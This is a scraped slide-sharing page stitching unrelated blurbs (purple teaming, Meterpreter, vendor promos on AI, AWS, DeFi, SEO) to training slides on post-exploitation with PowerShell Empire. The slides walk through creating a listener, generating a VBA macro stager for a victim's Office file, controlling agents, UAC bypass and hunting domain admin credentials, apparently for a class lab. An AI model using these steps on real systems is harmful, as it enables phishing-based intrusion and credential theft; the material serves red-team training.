This document outlines how to conduct Purple Team exercises using the Cyber Kill Chain and Extended Cyber Kill Chain frameworks. It discusses:
- Terminology related to purple teaming, red teaming, and blue teaming.
- The purple team process of conducting focused penetration testing with clear training objectives for the blue team.
- The Cyber Kill Chain and Extended Cyber Kill Chain models and how they can be used for exercises.
- Other frameworks like ATT&CK that can aid exercises.
- The different phases and teams involved in cyber exercises.
- Examples of exercises that could be done using various tools and techniques mapped to the kill chains, like port scanning with Nmap and collecting credentials with Mim
Purple Teaming is the idea of using a Red Team exercise with clear training objectives for the Blue Team.
Great exercises should not just be focused on testing a product, they should also test your active Blue Team members and their skills. But how does one start to think about a Purple Team exercise, how does one go about running one and what does it look like?
In this talk we will explain what, why and how, to plan an effective purple team exercise and give some examples. Most enterprise networks are Windows heavy so examples will heavily lean on this.
Testing Assumptions, gaps, blind spots is what being proactive is all about. This talk is both for the console folks and non-console folks.
This report is to explain some key commands within Meterpreter that allow you to have some sort of situational awareness. That is, how to gain more insight into system information, the user you currently are and what processes are running among other things.
This document provides a step-by-step guide to creating persistence with PowerSploit and the Veil Framework. It begins by using Veil-Evasion to generate a reverse Meterpreter payload, then extracts the base64 encoded payload to use in a PowerSploit persistence script. PowerSploit is used to generate a persistence script that will execute the payload and send a reverse shell to the attacker whenever a user logs into the victim machine. It also provides an alternative manual method using PowerShell commands directly without the PowerSploit script.
GraphRAG for Life Science to increase LLM accuracy - Tomaz Bratanic
GraphRAG for the life science domain, where you retrieve information from biomedical knowledge graphs using LLMs to increase the accuracy and performance of generated answers.
Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin... - Tatiana Kojar
Skybuffer AI, built on the robust SAP Business Technology Platform (SAP BTP), is the latest and most advanced version of our AI development, reaffirming our commitment to delivering top-tier AI solutions. Skybuffer AI harnesses all the innovative capabilities of the SAP BTP in the AI domain, from Conversational AI to cutting-edge Generative AI and Retrieval-Augmented Generation (RAG). It also helps SAP customers safeguard their investments into SAP Conversational AI and ensure a seamless, one-click transition to SAP Business AI.
With Skybuffer AI, various AI models can be integrated into a single communication channel such as Microsoft Teams. This integration empowers business users with insights drawn from SAP backend systems, enterprise documents, and the expansive knowledge of Generative AI. And the best part of it is that it is all managed through our intuitive no-code Action Server interface, requiring no extensive coding knowledge and making the advanced AI accessible to more users.
Ivanti’s Patch Tuesday breakdown goes beyond patching your applications and brings you the intelligence and guidance needed to prioritize where to focus your attention first. Catch early analysis on our Ivanti blog, then join industry expert Chris Goettl for the Patch Tuesday Webinar Event. There we’ll do a deep dive into each of the bulletins and give guidance on the risks associated with the newly-identified vulnerabilities.
Letter and Document Automation for Bonterra Impact Management (fka Social Sol... - Jeffrey Haguewood
Sidekick Solutions uses Bonterra Impact Management (fka Social Solutions Apricot) and automation solutions to integrate data for business workflows.
We believe integration and automation are essential to user experience and the promise of efficient work through technology. Automation is the critical ingredient to realizing that full vision. We develop integration products and services for Bonterra Case Management software to support the deployment of automations for a variety of use cases.
This video focuses on automated letter generation for Bonterra Impact Management using Google Workspace or Microsoft 365.
Interested in deploying letter generation automations for Bonterra Impact Management? Contact us at sales@sidekicksolutionsllc.com to discuss next steps.
This presentation provides valuable insights into effective cost-saving techniques on AWS. Learn how to optimize your AWS resources by rightsizing, increasing elasticity, picking the right storage class, and choosing the best pricing model. Additionally, discover essential governance mechanisms to ensure continuous cost efficiency. Whether you are new to AWS or an experienced user, this presentation provides clear and practical tips to help you reduce your cloud costs and get the most out of your budget.
Have you ever been confused by the myriad of choices offered by AWS for hosting a website or an API?
Lambda, Elastic Beanstalk, Lightsail, Amplify, S3 (and more!) can each host websites + APIs. But which one should we choose?
Which one is cheapest? Which one is fastest? Which one will scale to meet our needs?
Join me in this session as we dive into each AWS hosting service to determine which one is best for your scenario and explain why!
Programming Foundation Models with DSPy - Meetup Slides - Zilliz
Prompting language models is hard, while programming language models is easy. In this talk, I will discuss the state-of-the-art framework DSPy for programming foundation models with its powerful optimizers and runtime constraint system.
A Comprehensive Guide to DeFi Development Services in 2024 - Intelisync
DeFi represents a paradigm shift in the financial industry. Instead of relying on traditional, centralized institutions like banks, DeFi leverages blockchain technology to create a decentralized network of financial services. This means that financial transactions can occur directly between parties, without intermediaries, using smart contracts on platforms like Ethereum.
In 2024, we are witnessing an explosion of new DeFi projects and protocols, each pushing the boundaries of what’s possible in finance.
In summary, DeFi in 2024 is not just a trend; it’s a revolution that democratizes finance, enhances security and transparency, and fosters continuous innovation. As we proceed through this presentation, we'll explore the various components and services of DeFi in detail, shedding light on how they are transforming the financial landscape.
At Intelisync, we specialize in providing comprehensive DeFi development services tailored to meet the unique needs of our clients. From smart contract development to dApp creation and security audits, we ensure that your DeFi project is built with innovation, security, and scalability in mind. Trust Intelisync to guide you through the intricate landscape of decentralized finance and unlock the full potential of blockchain technology.
Ready to take your DeFi project to the next level? Partner with Intelisync for expert DeFi development services today!
5th LF Energy Power Grid Model Meet-up Slides - DanBrown980551
5th Power Grid Model Meet-up
It is with great pleasure that we extend to you an invitation to the 5th Power Grid Model Meet-up, scheduled for 6th June 2024. This event will adopt a hybrid format, allowing participants to join us either through an online Microsoft Teams session or in person at TU/e located at Den Dolech 2, Eindhoven, Netherlands. The meet-up will be hosted by Eindhoven University of Technology (TU/e), a research university specializing in engineering science & technology.
Power Grid Model
The global energy transition is placing new and unprecedented demands on Distribution System Operators (DSOs). Alongside upgrades to grid capacity, processes such as digitization, capacity optimization, and congestion management are becoming vital for delivering reliable services.
Power Grid Model is an open source project from Linux Foundation Energy and provides a calculation engine that is increasingly essential for DSOs. It offers a standards-based foundation enabling real-time power systems analysis, simulations of electrical power grids, and sophisticated what-if analysis. In addition, it enables in-depth studies and analysis of the electrical power grid’s behavior and performance. This comprehensive model incorporates essential factors such as power generation capacity, electrical losses, voltage levels, power flows, and system stability.
Power Grid Model is currently being applied in a wide variety of use cases, including grid planning, expansion, reliability, and congestion studies. It can also help in analyzing the impact of renewable energy integration, assessing the effects of disturbances or faults, and developing strategies for grid control and optimization.
What to expect
For the upcoming meetup we are organizing, we have an exciting lineup of activities planned:
-Insightful presentations covering two practical applications of the Power Grid Model.
-An update on the latest advancements in Power Grid Model technology during the first and second quarters of 2024.
-An interactive brainstorming session to discuss and propose new feature requests.
-An opportunity to connect with fellow Power Grid Model enthusiasts and users.
In the rapidly evolving landscape of technologies, XML continues to play a vital role in structuring, storing, and transporting data across diverse systems. The recent advancements in artificial intelligence (AI) present new methodologies for enhancing XML development workflows, introducing efficiency, automation, and intelligent capabilities. This presentation will outline the scope and perspective of utilizing AI in XML development. The potential benefits and the possible pitfalls will be highlighted, providing a balanced view of the subject.
We will explore the capabilities of AI in understanding XML markup languages and autonomously creating structured XML content. Additionally, we will examine the capacity of AI to enrich plain text with appropriate XML markup. Practical examples and methodological guidelines will be provided to elucidate how AI can be effectively prompted to interpret and generate accurate XML markup.
Further emphasis will be placed on the role of AI in developing XSLT, or schemas such as XSD and Schematron. We will address the techniques and strategies adopted to create prompts for generating code, explaining code, or refactoring the code, and the results achieved.
The discussion will extend to how AI can be used to transform XML content. In particular, the focus will be on the use of AI XPath extension functions in XSLT, Schematron, Schematron Quick Fixes, or for XML content refactoring.
The presentation aims to deliver a comprehensive overview of AI usage in XML development, providing attendees with the necessary knowledge to make informed decisions. Whether you’re at the early stages of adopting AI or considering integrating it in advanced XML development, this presentation will cover all levels of expertise.
By highlighting the potential advantages and challenges of integrating AI with XML development tools and languages, the presentation seeks to inspire thoughtful conversation around the future of XML development. We’ll not only delve into the technical aspects of AI-powered XML development but also discuss practical implications and possible future directions.
Best 20 SEO Techniques To Improve Website Visibility In SERP - Pixlogix Infotech
Boost your website's visibility with proven SEO techniques! Our latest blog dives into essential strategies to enhance your online presence, increase traffic, and rank higher on search engines. From keyword optimization to quality content creation, learn how to make your site stand out in the crowded digital landscape. Discover actionable tips and expert insights to elevate your SEO game.
Skybuffer SAM4U tool for SAP license adoption - Tatiana Kojar
Manage and optimize your license adoption and consumption with SAM4U, an SAP free customer software asset management tool.
SAM4U, an SAP complimentary software asset management tool for customers, delivers a detailed and well-structured overview of license inventory and usage with a user-friendly interface. We offer a hosted, cost-effective, and performance-optimized SAM4U setup in the Skybuffer Cloud environment. You retain ownership of the system and data, while we manage the ABAP 7.58 infrastructure, ensuring fixed Total Cost of Ownership (TCO) and exceptional services through the SAP Fiori interface.
Ocean lotus Threat actors project by John Sitima 2024 (1).pptx - SitimaJohn
Ocean Lotus cyber threat actors represent a sophisticated, persistent, and politically motivated group that poses a significant risk to organizations and individuals in the Southeast Asian region. Their continuous evolution and adaptability underscore the need for robust cybersecurity measures and international cooperation to identify and mitigate the threats posed by such advanced persistent threat groups.
Generating privacy-protected synthetic data using Secludy and Milvus - Zilliz
During this demo, the founders of Secludy will demonstrate how their system utilizes Milvus to store and manipulate embeddings for generating privacy-protected synthetic data. Their approach not only maintains the confidentiality of the original data but also enhances the utility and scalability of LLMs under privacy constraints. Attendees, including machine learning engineers, data scientists, and data managers, will witness first-hand how Secludy's integration with Milvus empowers organizations to harness the power of LLMs securely and efficiently.
2. @haydnjohnson
Post Exploitation
● Have gained access
a. Via phishing
b. Via Exploit
c. Via ??
● Want to know where we are in the network
● Want to know WHO we are
● What PERMISSIONS do we have
● Getting a shell is just the beginning :)
3. @haydnjohnson
So you have gained access - Now what
● What Box are you on?
○ IP address
○ What platform?
○ Service Pack?
● Normal User or Privileged User?
○ What permissions
○ What can you execute
● What else is out in the Abyss?
○ Network shares
○ Other boxes
○ Where are the domain admins??
5. @haydnjohnson
We want to pilfer - quietly as possible
● As small a footprint as possible
● Use native tools
● A scripting language like bash, but for Windows?
● BATCH any good?
6. @haydnjohnson
PowerShell - our best friend
● It is native - pretty much guaranteed to be available
● Full .NET access
● Most likely to be whitelisted
● Access to Win32 API
○ Access to Kernel
● Run things in memory!
○ Even assemble binaries
For an amazing explanation read:
http://www.exploit-monday.com/2012/08/Why-I-Choose-PowerShell.html
10. @haydnjohnson
Pocketful of goodies!
● Create Listeners easily
○ PowerShell command straight into CMD
○ VBA for excel Macros
○ Ducky scripts
● Agents (C2 comms) are easy to use
● Modules and more modules!
18. @haydnjohnson
The plan
1. Install PowerShell Empire
2. Create a listener
3. Execute an Agent on Victim
4. Run modules
5. Escalate to high privileged process as Admin (bypassuac)
6. Look for other shares/boxes to get Domain Admin
a. If the class infrastructure has AD
19. @haydnjohnson
Tutorial to Follow Part 1 - Getting Access
https://www.cybrary.it/0p3n/powershell-empire-stagers-1-phishing-office-macro-evading-avs/
● Covers Installation
● Receiving connection via a VBA Macro
21. @haydnjohnson
Create a Listener
“listeners” - switch to listeners mode
“options” | “info” - view options to configure
“set Name Test1” - Set a name for listener
“execute” - activates the listener
22. @haydnjohnson
Create a macro
“usestager macro Test” - create macro for the listener named Test
“options” - ensure listener is connected
“execute” - will create a file with VBA code
Add the code from the macro into the victim's Excel/Word document.
Execute file and receive agent
If there is no Excel/Word, use “usestager launcher” and copy and paste the output into CMD.
24. @haydnjohnson
Tutorial To Follow Part 2 - Controlling your agent
https://www.cybrary.it/0p3n/powershell-empire-stagers-2-controlling-victims-machine/
Opened file - should have an agent
“agents” - will take you to the listing of agents
“interact ABCDEDINDF” - select the agent to interact with.
“sysinfo” - gain information about your victim
“usemodule” <tab> - gain a list of all the awesomeness
25. @haydnjohnson
Useful commands
● > git clone https://github.com/PowerShellEmpire/Empire.git
● > listeners
○ List & create listeners
● > usestager launcher
○ usestager <tab> to see other launchers :)
● > agents
○ > sysinfo - list system info of the box the agent is on
● > usemodule <tab>
● bypassuac <2nd listener>
26. @haydnjohnson
Goals
Find a flag - you have local admin access, and there is a flag on an open share. Find it.
Get Domain Admin credentials - you may need to ‘hunt’ for a domain admin
27. @haydnjohnson
Any other fun stuff we can do?
Detailed case study:
https://enigma0x3.net/2016/01/28/an-empire-case-study/